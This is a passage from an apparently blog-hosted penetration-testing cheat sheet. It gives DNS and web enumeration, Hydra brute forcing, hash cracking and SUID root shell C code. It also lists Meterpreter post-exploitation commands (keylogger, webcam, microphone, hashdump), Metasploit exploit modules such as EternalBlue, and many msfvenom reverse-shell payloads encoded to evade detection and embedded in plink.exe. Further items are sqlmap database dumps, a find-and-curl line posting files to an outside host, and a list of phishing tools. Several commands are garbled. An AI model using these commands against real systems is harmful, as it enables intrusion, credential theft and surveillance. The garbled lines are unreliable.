method</p><h4>DNSRecon</h4><p>DNSRecon provides the ability to perform various DNS enumeration tasks.<br>dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std — xml ouput.xml</p><h4>HTTP/HTTPS Webserver Enumeration</h4><p>nikto -h 192.168.1.1 <br>&gt; Perform a nikto scan on the target<br>dirbuster <br>Configuring via GUI, CLI input doesn’t work most of the time<br>gobuster dir -u 192.168.1.1-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <br>&gt; Directory brute force and saboteurs<br>wpscan — url 192.168.1.1 <br>&gt; WordPress Vulnerability Scanner<br>joomscan -u 192.168.1.1 <br>&gt; Jomla Vulnerability Scanner<br>uniscan -u 192.168.1.1-qweds <br>&gt; Uniscan automated vulnerability scanner<br>curl -I 192.168.1.1 <br>&gt; Using curl to get HTTP headers<br>nmap -p80 — script http-enum 192.168.1.1 <br>&gt; Nmap script for HTTP enumeration<br>whatweb 192.168.1.1 <br>&gt; Identify the technologies used on the website<br>wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt — hc 404 192.168.1.1/FUZZ <br>&gt; Fuzzing HTTP with wfuzz</p><h4>Packet inspection</h4><p>tcpdump tcp port 80 -w output.pcap -i eth0 <br>&gt; Capture packets on port 80<br>‘tcpdump -i eth0 ‘port 443 and (tcp-syn tcp-ack)! =0’’<br>wireshark -k -i &lt;interface&gt; <br>&gt; Open Wireshark on a specific interface<br>tshark -i eth0 -f “tcp port 80” <br>&gt; Use tshark to capture packets on port 80</p><h4>Username enumeration</h4><p>SMB user enumeration<br>python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX <br>&gt; Enumerate users from SMB<br>ridenum.py 192.168.XXX.XXX500 50000 dict.txt <br>&gt; RID period SMB/enumerate users from SMB<br>enum4linux -U 192.168.XXX.XXX <br>&gt; Enumerate SMB usernames using enum4linux</p><h4>SNMP user enumeration</h4><p>snmpwalk public -v1 192.168.X.XXX1 <br>&gt; Grepp77.1.2.25<br>python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX <br>&gt; Enumerate users from SNMP<br>nmap -sT -p 161 192.168.X.XXX/254-oG snmp_results.txt <br>&gt; Search for SNMP servers with nmap, grepable output</p><h4>ℌ𝔞𝔰𝔥𝔢𝔰 &amp; 𝔭𝔞𝔰𝔰𝔴𝔡</h4><p><a href="https://www.freecodecamp.org/portuguese/news/md5-x-sha-1-x-sha-2-qual-e-o-hash-de-criptografia-mais-seguro-e-como-verifica-lo/">MD5 x SHA-1 x SHA-2 - Qual é o hash de criptografia mais seguro e como verificá-lo</a></p><h4>Password</h4><p>word list<br>Order describe<br>/usr/share/wordlists <br>&gt; Kali word list<br>wget 1000000.txt <br>&gt; Download the hot word list from GitHub</p><h4>Brute force cracking service</h4><p>Hydra<br>FTP brute force cracking<br>Order describe<br>hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXXftp -V <br>&gt; Hydra FTP Brute Force<br>POP3 Brute Force<br>Order describe<br>hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXXpop3 -V <br>&gt; Hydra POP3 Brute Force<br>hydra -L &lt;username_list_file.ext&gt; -P &lt;password_list_file.ext&gt; &lt;ip_host&gt; &lt;service&gt; -V <br>&gt; Dictionary Attack: If you have lists of usernames and passwords, you can use Hydra to perform a dictionary attack with the following command</p><p>SMTP brute force cracking</p><p>hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXXsmtp -V <br>&gt; Hydra SMTP Brute Force</p><p>SSH brute force cracking</p><p>hydra -l root -P /usr/share/wordlistsnmap.lst 192.168.X.XXXssh <br>&gt; Hydra SSH Brute Force<br>&gt; Used to limit concurrent connections, for example:-t-t 15</p><h4>John The Ripper — JTR</h4><p>john –wordlist=/usr/share/wordlists/rockyou.txt hashes JTR password cracking<br>john –format=descrypt –wordlist /usr/share/wordlists/rockyou.txt hash.txt <br>&gt; JTR forces the use of word lists for decryption cracking<br>john –format=descrypt hash –show <br>&gt; JTR forced decryption brute force cracking<br>john — wordlist=/usr/share/wordlists/rockyou.txt hash.txt — format=Raw-MD5 <br>&gt; MD5 Crack</p><p>john — format=krb4 hashes.txt (example format kerberos)</p><h4>Hashcat</h4><p>hashcat -m 0 -a 0 hash.txt wordlist.txt Hashcat MD5 Crack<br>hashcat -m 1000 -a 0 hash.txt wordlist.txt Hashcat NTLM Crack<br>with Hashcat<br>hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt — force<br>&gt; Here are the hashes generated for the input strings.<br>MD5 hash -&gt; 42f749ade7f9e195bf475f37a44cafcb<br>SHA1 hash -&gt; b2e98ad6f6eb8508dd6a14cfa704bad7f05f6fb1</p><h4>𝔈𝔵𝔭𝔩𝔬𝔦𝔱 ℜ𝔢𝔰𝔢𝔞𝔯𝔠𝔥</h4><p>‘Search window 2003 grep -i local’<br>site: exploit-db.comexploit kernel &lt;= 3 Google search for kernel vulnerabilities <br>grep -R “W7” /usr/share/metasploit-framework/modules/exploit/windows/* <br>&gt; Searching for Windows 7 vulnerabilities in Metasploit modules<br>msfconsole -q -x “search name:windows type:exploit” <br>&gt; Search Metasploit for Windows exploits</p><h4>Compilation vulnerability</h4><p>Determine if C code is for Windows or Linux<br>process.h, string.h, winbase.h, windows.h, winsock2.h window<br>arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h Linux directory</p><h4>Building an exploit for GCC</h4><p>gcc -o exploit exploit.c Basic GCC compilation<br>gcc -Wall -Wextra exploit.c -o exploit <br>&gt; Compile with all warnings and extras</p><p>GCC compilation 64-bit vulnerability on 32Bit Kali<br>gcc -m32 exploit.c -o exploit Cross-compiling 64-bit binaries on 32-bit Linux</p><h4>Compile Windows .exe on Linux</h4><p>i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe <br>&gt; Compile Windows .exe on Linux<br>x86_64-w64-mingw32-gcc exploit.c -o exploit.exe <br>&gt; Compile 64-bit Windows .exe on Linux</p><h4>SUID C Shell for /bin/bash</h4><p>int main(void){<br> setresuid(0, 0, 0);<br> system(“/bin/bash”);<br>}<br>SUID C Shell for /bin/sh<br>int main(void){<br> setresuid(0, 0, 0);<br> system(“/bin/sh”);<br>}</p><h4>Building SUID shell binaries</h4><p>gcc -o suid suid.c <br>&gt; Compile SUID shell<br>gcc -m32 -o suid suid.c <br>&gt; Compiling a 32-bit SUID shell</p><p>TTY shell<br>Python TTY Shell Trick<br>python -c ‘import pty;pty.spawn(“/bin/bash”)’<br>python3 -c ‘import pty;pty.spawn(“/bin/bash”)’</p><p>Generate an interactive sh shell<br>/bin/sh -i</p><p>Generate Perl TTY shell<br>perl -e ‘exec “/bin/sh”;’</p><p>Generate ruby ​​TTY shell<br>ruby -e ‘exec “/bin/sh”’</p><p>Generate Lure TTY Shell<br>lua -e ‘os.execute(“/bin/sh”)’</p><p>Generate TTY shell from Vi<br>:!bash</p><p>Generate TTY shell from NMAP<br>!sh</p><p>Generate TTY shell from awk<br>awk ‘BEGIN {system(“/bin/sh”)}’</p><p>Generate TTY shell from Sokat<br>socat file:tty,raw,echo=0 tcp-listen:4444</p><h4>Metasploit</h4><p>Metasploit<br>instrument payload<br>Windows reverse meter payload<br>set payload windows/meterpreter/reverse_tcp</p><p>Windows VNC Meterpreter payload<br>set payload windows/vncinject/reverse_tcp<br>set ViewOnly false</p><p>Linux Reverse Meterpreter payload<br>set payload linux/meterpreter/reverse_tcp</p><p>Android reverse meter payload<br>set payload android/meterpreter/reverse_tcp</p><p>Instrument Cheat Sheet<br>upload file c:\\windows <br>&gt; Upload file to window target<br>download c:\\windows\\repair\\sam /tmp <br>&gt; Download file from windows target<br>execute -fc:\\windows\temp\exploit.exe <br>&gt; Run the .exe on the target<br>execute -f cmd -c</p><p>Create new channel using cmd shell<br>PS <br>&gt; Show process<br>shell <br>&gt; Get the shell on the target<br>getsystem <br>&gt; Try elevating privileges on the target<br>hashdump <br>&gt; Dump hash on target<br>portfwd add -l 3389 -p 3389 -r target <br>&gt; Create a port forwarded to the target computer<br>portfwd delete –l 3389 –p 3389 –r target <br>&gt; Remove port forwarding<br>screenshot <br>&gt; Capture a screenshot of the target computer<br>keyscan_start <br>&gt; Start keylogger<br>keyscan_dump <br>&gt; Dump collected keystrokes<br>webcam_snap <br>&gt; Take a webcam snapshot<br>record_mic <br>&gt; Recording microphone<br>enum_chrome <br>&gt; Enumerate Chrome browser data</p><p>Common metamodules<br>Remote Windows Metasploit Modules <br>(exploits)<br>use exploit/windows/smb/ms08_067_netapi <br>&gt; MS08_067 Windows 2k, XP, 2003 remote exploit<br>use exploit/windows/dcerpc/ms06_040_netapi <br>&gt; MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit<br>use exploit/windows/smb/ms09_050_smb2_negotiate_func_index <br>&gt; MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Attack<br>use exploit/windows/smb/ms17_010_eternalblue <br>&gt; MS17_010 Eternal Blue SMB remote window kernel pool is damaged</p><p>Local Windows Metasploit Modules <br>(exploits)<br>use exploit/windows/local/bypassuac <br>&gt; Bypass UAC + set target + architecture on Windows 7, x86/64<br>use exploit/windows/local/ms10_015_kitrap0d <br>&gt; MS10_015 Kitrap0d local privilege escalation</p><p>Auxiliary metamodule<br>use auxiliary/scanner/http/dir_scanner <br>&gt; Metasploit HTTP Directory Scanner<br>use auxiliary/scanner/http/jboss_vulnscan <br>&gt; Metasploit JBOSS Vulnerability Scanner<br>use auxiliary/scanner/mssql/mssql_login <br>&gt; Metasploit MSSQL Credential Scanner<br>use auxiliary/scanner/mysql/mysql_version <br>&gt; Metasploit MySQL Version Scanner<br>use auxiliary/scanner/oracle/oracle_login <br>&gt; Metasploit Oracle Login Module</p><p>Metasploit Powershell Modules<br>use exploit/multi/script/web_delivery <br>&gt; Metasploit Power Shell Payload Delivery Module<br>post/windows/manage/powershell/exec_powershell <br>&gt; Upload and run Powershell scripts through sessions<br>use exploit/multi/http/jboss_maindeployer <br>&gt; Metasploit JBOSS deploy<br>use exploit/windows/mssql/mssql_payload <br>&gt; Metasploit MSSQL payload</p><p>Post-exploit window meta-module<br>run post/windows/gather/win_privs <br>&gt; Metasploit displays the current user’s permissions<br>use post/windows/gather/credentials/gpp <br>&gt; Metasploit scrapes GPP saved passwords<br>load mimikatz -&gt; wdigest <br>&gt; Metasploit load Mimikatz<br>run post/windows/gather/local_admin_search_enum <br>&gt; Identifies other computers to which the provided domain user has administrative access</p><h4>MSFVenom Payloads</h4><p>### PHP reverse shell<br>msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php</p><p>### Java WAR reverse shell<br>msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war</p><p>### Linux bind shell<br>msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b “\x00\x0a\x0d\x20” -e x86/shikata_ga_nai</p><p>### Linux reverse shell<br>msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o pay</p><p>&gt;&gt; use payload/linux/x86/shell_reverse_tcp<br>&gt;&gt; set LHOST 10.10.10.10<br>&gt;&gt; exploit</p><p>### Linux FreeBSD reverse shell<br>`msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf`</p><p>### Linux C reverse shell<br>`msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c`</p><p>### Windows non staged reverse shell<br>`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe`</p><p>### Windows Staged (Meterpreter) reverse shell<br>`msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe`</p><p>### Windows Python reverse shell<br>`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py`</p><p>### Windows ASP reverse shell<br>`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp`</p><p>### Windows ASPX reverse shell<br>`msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx`</p><p>### Windows JavaScript reverse shell with nops<br>`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18`</p><p>### Windows Powershell reverse shell<br>`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1`</p><p>### Windows reverse shell excluding bad characters<br>`msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b “\x00\x04” -e x86/shikata_ga_nai`</p><p>### Windows x64 bit reverse shell<br>`msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe`</p><p>### Windows reverse shell embedded into plink<br>`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe`</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mTrdqlKxf4UHCj-_nf_QeA.jpeg" /></figure><h4>Networking</h4><p>TTL fingerprint recognition<br>Operating system TTL size<br>window 128<br>Linux directory 64<br>Solaris 255<br>Cisco/Network 255</p><h4>Cisco IOS commands</h4><p>conf t Abbreviation, configuration terminal<br>(config)# interface fa0/0 Configure Fast Ethernet 0/0<br>(config-if)#ip addr 0.0.0.0 255.255.255.255 Add IP to fa0/0<br>(config-if)# line vty 0 4 Configure vty lines<br>(config-line)# login Cisco sets remote login password<br>(config-line)# password YOUR-PASSWORD Set remote login password<br># show running-config Displays the running configuration loaded in memory<br># show startup-config Show startup configuration<br># show version Show Cisco IOS version<br># show session Show open sessions<br>#showipinterface show network interface<br># show interface e0 Show detailed interface information<br>#showiproute show route<br># show access-lists Show access list<br># dir file systems Show available files<br># dir all-filesystems File information<br># dir /all Show deleted files<br># terminal length 0 Unlimited terminal output<br># copy running-config tftp Copy the running configuration to the tftp server<br># copy running-config startup-config Copy startup configuration to running configuration</p><h4>Cryptography</h4><p>Hash length<br>MD5 16 bytes<br>SHA-1 20 bytes<br>SHA-256 32 bytes<br>SHA-512 64 byte</p><p>Hash example<br>MD5 hash example 8743b52063cd84097a65d1633f5c74f5<br>SHA1 hash example B89EAAC7E61417341b710b727768294d0e6a277b<br>SHA-256 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935<br>SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f</p><h4>SQLMap example</h4><p>sqlmap -u meh.com–forms –batch –crawl=10 –cookie=jsessionid=54321 –level=5 –risk=3 Automatic sqlmap scanning</p><p>sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE –level=3 –current-user –current-db –passwords –file-read=”/var/www/blah.php” Targeted sqlmap scanning</p><p>sqlmap -u “ meh.com/meh.php? “ –dbms=mysql –tech=U –random-agent –dump Scan URLs for federation + error based injection with MySQL backend and use random user agent + database dump</p><p>sqlmap -o -u “ meh.com/form/”-forms SQLMap inspection form for injection</p><p>sqlmap -o -u “ meh/vuln-form” –forms -D database-name -T users –dump SQLMap dump and cracked hash of table user on database name</p><h4>Nmap insights combination</h4><p>Slow scan all ports with nmap:<br>nmap — privileged -sV -sC -sS -p- -oN nmap &lt;host&gt;</p><p>To get more information about the services that are running on the ports, let’s run an nmap scan with the -A option.<br>nmap -A -sV -sC &lt;host&gt; -p80,135,139,445</p><p>TCP SYN Scan (-sS): <br>This scan type is used to determine if a port is open on the target host. It is considered stealthy because it does not complete the TCP handshake.</p><p>TCP Connect Scan (-sT): <br>This scan type attempts to establish a full TCP connection to the target port. It is less stealthy than the SYN scan but can be useful for identifying services running on the target port.</p><p>UDP Scan (-sU): <br>This scan type is used to discover open UDP ports on the target host. It is particularly useful for services that communicate over UDP.</p><p>TCP NULL Scan (-sN): <br>This scan type sends packets with the TCP flags set to NULL, which can help in identifying hosts that are up and running.</p><p>TCP FIN Scan (-sF): <br>This scan type sends packets with the TCP FIN flag set, which can be used to determine if a port is open on the target host.</p><p>Xmas Scan (-sX): <br>This scan type sends packets with the TCP FIN, PSH, and URG flags set, which can be used to identify hosts that are up and running.</p><p>TCP ACK Scan (-sA): <br>This scan type sends packets with the TCP ACK flag set, which can be used to determine if a port is open on the target host.</p><p>IP Protocol Scan (-sO): <br>This scan type is used to identify the IP protocols supported by the target host.</p><p>SCTP COOKIE ECHO Scan (-sZ): <br>This scan type is used to discover SCTP ports on the target host.</p><p>Idle Scan (-sI): <br>This scan type is used to perform a scan when the network is idle, reducing the chance of detection.</p><p>Additional Useful Commands<br>Service Version Detection: <br>Use nmap -sV <br>to detect the version of services running on open ports.</p><p>OS Detection: <br>Use nmap -O <br>to attempt to determine the operating system of the target host.</p><p>Script Scanning: <br>Use nmap — script=&lt;script-name&gt; <br>to run specific NSE (Nmap Scripting Engine) scripts for more detailed scanning.</p><p>Traceroute: <br>Use nmap — traceroute <br>to perform a traceroute to the target host.</p><p>Ping Sweep: <br>Use nmap -sn <br>to perform a ping sweep, which is useful for host discovery without port scanning.</p><h4>Gobuster</h4><p>Let’s search the directories with gobuster. In the parameters we specify the number of threads 128 (-t), URL (-u), dictionary (-w) and extensions we are interested in (-x).</p><p>gobuster dir -t 128 -k -u &lt;host&gt; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,sh,cgi</p><p>gobsuter dir -t 50 -k -u http/10.10.x.x:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s ‘200,301’ — no-error</p><p>Let’s search the subdomains with gobuster:<br>gobuster vhost -u &lt;host&gt; -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -k</p><h4>Ffuf cheat sheet</h4><p>LFI Fuzzing<br>Basic LFI fuzzing with ../<br>ffuf -w /path/to/wordlist.txt -u <a href="http://target/file.php?file=../../FUZZ">http://target/file.php?file=../../FUZZ</a></p><p>Advanced LFI fuzzing with nullbyte (%00) termination<br>ffuf -w /path/to/wordlist.txt -u “<a href="http://target/file.php?file=../FUZZ%00">http://target/file.php?file=../FUZZ%00</a>&quot;</p><p>Extension Fuzzing<br>Fuzzing file extensions with custom wordlist<br>ffuf -w /path/to/wordlist.txt -u <a href="http://target/file.FUZZ">http://target/file.FUZZ</a></p><p>Fuzzing multiple extensions at once<br>ffuf -w /path/to/extensions.txt -u <a href="http://target/file.FUZZ">http://target/file.FUZZ</a></p><p>Page Fuzzing<br>Fuzzing parameter values on a specific page<br>ffuf -w /path/to/wordlist.txt -u <a href="http://target/page.php?id=FUZZ">http://target/page.php?id=FUZZ</a></p><p>Advanced page fuzzing with cookies and headers<br>ffuf -w /path/to/wordlist.txt -u <a href="http://target/page.php">http://target/page.php</a> -b “cookie1=value1; cookie2=value2” -H “Authorization: Bearer FUZZ”</p><p>General Tips:<br>-w : Specifies the wordlist file<br>-u : Specifies the target URL with FUZZ as the placeholder<br>-mc : Match only specified HTTP status codes (e.g., -mc 200,404)<br>-recursion : Enable directory recursion<br>-recursion-depth : Set recursion depth level<br>-H : Set custom header (e.g., Host for virtual host scanning)<br>-b : Set custom cookies for requests<br>%00 : Nullbyte termination for LFI fuzzing</p><h4>Find command</h4><p>Basic Examples:<br>Search for files or directories with the exact name “example.txt” in the current directory (and its subdirectories).<br>find . -name “example.txt”</p><p>Find all directories in the “/home” directory. <br>find /home -type d</p><p>Search for files owned by the user “john” in the “/data” directory. <br>find /data -user john</p><p>Find all files with the extension “.txt” in the current directory and download them using `curl`. <br>find . -type f -name “*.txt” -exec curl -O {} \;</p><p>Intermediate Examples:<br>Extract specific content from a webpage using `curl` and `sed`.<br>curl <a href="https://example.com/page.html">https://example.com/page.html</a> | sed -n ‘s/&lt;p&gt;\(.*\)&lt;\/p&gt;/\1/p’</p><p>Find all directories in the “/home” directory and count the number of files in each using `find` and `wc`.<br>find /home -type d -exec sh -c ‘echo -n “{}: “; find “{}” -type f | wc -l’ \;</p><p>Find all files modified in the last 7 days and perform an HTTP POST request with their content using `find`, `curl`, and `xargs`.<br>find . -type f -mtime -7 -print0 | xargs -0 -I{} curl -X POST -d @{} <a href="https://api.example.com/upload">https://api.example.com/upload</a></p><p>Search for files with the extension “.log” in the “/var/logs” directory, compress them, and store in a backup folder using `find`, `curl`, and `tar`.<br>find /var/logs -type f -name “*.log” -exec tar czvf /backup/logs_backup.tar.gz {} \;</p><p>Advanced Examples:<br>Find all files in the current directory larger than 10MB and delete them using `find` and `rm`.<br>find . -type f -size +10M -exec rm {} \;</p><h4>10 Phishing Tools</h4><p>Evilginx2:- <a href="https://github.com/kgretzky/evilginx2">https://github.com/kgretzky/evilginx2</a><br>SEToolkit:- <a href="https://github.com/trustedsec/social-engineer-toolkit">https://github.com/trustedsec/social-engineer-toolkit</a><br>King-Phisher:- <a href="https://github.com/rsmusllp/king-phisher">https://github.com/rsmusllp/king-phisher</a><br>Gophish:- <a href="https://getgophish.com/">https://getgophish.com/</a><br>Wifiphisher:-<a href="https://github.com/wifiphisher/wifiphisher">https://github.com/wifiphisher/wifiphisher</a><br>socialfish:-<a href="https://github.com/UndeadSec/SocialFish">https://github.com/UndeadSec/SocialFish</a><br>black eye:-<a href="https://github.com/An0nUD4Y/blackeye">https://github.com/An0nUD4Y/blackeye</a><br>shellfish:-<a href="https://github.com/AbirHasan2005/ShellPhish">https://github.com/AbirHasan2005/ShellPhish</a><br>zphisher:-<a href="https://github.com/topics/zphisher">https://github.com/topics/zphisher</a><br>AdvPhishing:-<a href="https://github.com/Ignitetch/AdvPhishing">https://github.com/Ignitetch/AdvPhishing</a></p><h4>Cyber Security Links</h4><p><a href="http://carnal0wnage.blogspot.com/">http://carnal0wnage.blogspot.com/</a><br> <a href="http://www.mcgrewsecurity.com/">http://www.mcgrewsecurity.com/</a><br> <a href="http://www.gnucitizen.org/blog/">http://www.gnucitizen.org/blog/</a><br> <a href="http://www.darknet.org.uk/">http://www.darknet.org.uk/</a><br> <a href="http://spylogic.net/">http://spylogic.net/</a><br> <a href="http://taosecurity.blogspot.com/">http://taosecurity.blogspot.com/</a><br> <a href="http://www.room362.com/">http://www.room362.com/</a><br> <a href="http://blog.sipvicious.org/">http://blog.sipvicious.org/</a><br> <a href="http://blog.portswigger.net/">http://blog.portswigger.net/</a><br> <a href="http://pentestmonkey.net/blog/">http://pentestmonkey.net/blog/</a><br> <a href="http://jeremiahgrossman.blogspot.com/">http://jeremiahgrossman.blogspot.com/</a><br> <a href="http://i8jesus.com/">http://i8jesus.com/</a><br> <a href="http://blog.c22.cc/">http://blog.c22.cc/</a><br> <a href="http://www.skullsecurity.org/blog/">http://www.skullsecurity.org/blog/</a><br> <a href="http://blog.metasploit.com/">http://blog.metasploit.com/</a><br> <a href="http://www.darkoperator.com/">http://www.darkoperator.com/</a><br> <a href="http://blog.skeptikal.org/">http://blog.skeptikal.org/</a><br> <a href="http://preachsecurity.blogspot.com/">http://preachsecurity.blogspot.com/</a><br> <a href="http://www.tssci-security.com/">http://www.tssci-security.com/</a><br> <a href="http://www.gdssecurity.com/l/b/">http://www.gdssecurity.com/l/b/</a><br> <a href="http://websec.wordpress.com/">http://websec.wordpress.com/</a><br> <a href="http://bernardodamele.blogspot.com/">http://bernardodamele.blogspot.com/</a><br> <a href="http://laramies.blogspot.com/">http://laramies.blogspot.com/</a><br> <a href="http://www.spylogic.net/">http://www.spylogic.net/</a><br> <a href="http://blog.andlabs.org/">http://blog.andlabs.org/</a><br> <a href="http://xs-sniper.com/blog/">http://xs-sniper.com/blog/</a><br> <a href="http://www.commonexploits.com/">http://www.commonexploits.com/</a><br> <a href="http://www.sensepost.com/blog/">http://www.sensepost.com/blog/</a><br> <a href="http://wepma.blogspot.com/">http://wepma.blogspot.com/</a><br> <a href="http://exploit.co.il/">http://exploit.co.il/</a><br> <a href="http://securityreliks.wordpress.com/">http://securityreliks.wordpress.com/</a><br> <a href="http://www.madirish.net/index.html">http://www.madirish.net/index.html</a><br> <a href="http://sirdarckcat.blogspot.com/">http://sirdarckcat.blogspot.com/</a><br> <a href="http://reusablesec.blogspot.com/">http://reusablesec.blogspot.com/</a><br> <a href="http://myne-us.blogspot.com/">http://myne-us.blogspot.com/</a><br> <a href="http://www.notsosecure.com/">http://www.notsosecure.com/</a><br> <a href="http://blog.spiderlabs.com/">http://blog.spiderlabs.com/</a><br> <a href="http://www.corelan.be/">http://www.corelan.be/</a><br> <a href="http://www.digininja.org/">http://www.digininja.org/</a><br> <a href="http://www.pauldotcom.com/">http://www.pauldotcom.com/</a><br> <a href="http://www.attackvector.org/">http://www.attackvector.org/</a><br> <a href="http://deviating.net/">http://deviating.net/</a><br> <a href="http://www.alphaonelabs.com/">http://www.alphaonelabs.com/</a><br> <a href="http://www.smashingpasswords.com/">http://www.smashingpasswords.com/</a><br> <a href="http://wirewatcher.wordpress.com/">http://wirewatcher.wordpress.com/</a><br> <a href="http://gynvael.coldwind.pl/">http://gynvael.coldwind.pl/</a><br> <a href="http://www.nullthreat.net/">http://www.nullthreat.net/</a><br> <a href="http://www.question-defense.com/">http://www.question-defense.com/</a><br> <a href="http://archangelamael.blogspot.com/">http://archangelamael.blogspot.com/</a><br> <a href="http://memset.wordpress.com/">http://memset.wordpress.com/</a><br> <a href="http://sickness.tor.hu/">http://sickness.tor.hu/</a><br> <a href="http://punter-infosec.com/">http://punter-infosec.com/</a><br> <a href="http://www.securityninja.co.uk/">http://www.securityninja.co.uk/</a><br> <a href="http://securityandrisk.blogspot.com/">http://securityandrisk.blogspot.com/</a><br> <a href="http://esploit.blogspot.com/">http://esploit.blogspot.com/</a><br> <a href="http://www.pentestit.com/">http://www.pentestit.com/</a></p><h4>Forums:</h4><p><a href="http://sla.ckers.org/forum/index.php">http://sla.ckers.org/forum/index.php</a><br> <a href="http://www.ethicalhacker.net/">http://www.ethicalhacker.net/</a><br> <a href="http://www.backtrack-linux.org/forums/">http://www.backtrack-linux.org/forums/</a><br> <a href="http://www.elitehackers.info/forums/">http://www.elitehackers.info/forums/</a><br> <a href="http://www.hackthissite.org/forums/index.php">http://www.hackthissite.org/forums/index.php</a><br> <a href="http://securityoverride.com/forum/index.php">http://securityoverride.com/forum/index.php</a><br> <a href="http://www.iexploit.org/">http://www.iexploit.org/</a><br> <a href="http://bright-shadows.net/">http://bright-shadows.net/</a><br> <a href="http://www.governmentsecurity.org/forum/">http://www.governmentsecurity.org/forum/</a><br> <a href="http://forum.intern0t.net">http://forum.intern0t.net</a></p><h4>Exploits and Advisories:</h4><p><a href="http://www.exploit-db.com/">http://www.exploit-db.com/</a><br> <a href="http://www.cvedetails.com/">http://www.cvedetails.com/</a><br> <a href="http://www.milw0rm.com/">http://www.milw0rm.com/</a> (Down permanently)<br> <a href="http://www.packetstormsecurity.org/">http://www.packetstormsecurity.org/</a><br> <a href="http://www.securityforest.com/wiki/index.php/Main_Page">http://www.securityforest.com/wiki/index.php/Main_Page</a><br> <a href="http://www.securityfocus.com/bid">http://www.securityfocus.com/bid</a><br> <a href="http://nvd.nist.gov/">http://nvd.nist.gov/</a><br> <a href="http://osvdb.org/">http://osvdb.org/</a><br> <a href="http://www.nullbyte.org.il/Index.html">http://www.nullbyte.org.il/Index.html</a><br> <a href="http://secdocs.lonerunners.net/">http://secdocs.lonerunners.net/</a><br> <a href="http://www.phenoelit-us.org/whatSAP/index.html">http://www.phenoelit-us.org/whatSAP/index.html</a><br> <a href="http://secunia.com/">http://secunia.com/</a><br> <a href="http://cve.mitre.org/">http://cve.mitre.org/</a></p><p>𝖳𝗁𝖺𝗇𝗄𝗌 𝖿𝗈𝗋 𝗌𝗍𝗈𝗉𝗉𝗂𝗇𝗀 𝖻𝗒, 𝖼𝗈𝗇𝗇𝖾𝖼𝗍 𝗐𝗂𝗍𝗁 𝗆𝖾 𝗈𝗇 𝗌𝗈𝖼𝗂𝖺𝗅 𝗆𝖾𝖽𝗂𝖺, 𝖺𝗇𝖽 𝗌𝖾𝖾 𝗒𝗈𝗎 𝗇𝖾𝗑𝗍 𝗍𝗂𝗆𝖾!</p><p><a href="https://beacons.ai/morganbinbash">https://beacons.ai/morganbinbash</a></p><p><a href="https://linktr.ee/morganbinbash">@morganbinbash | Linktree</a></p><iframe 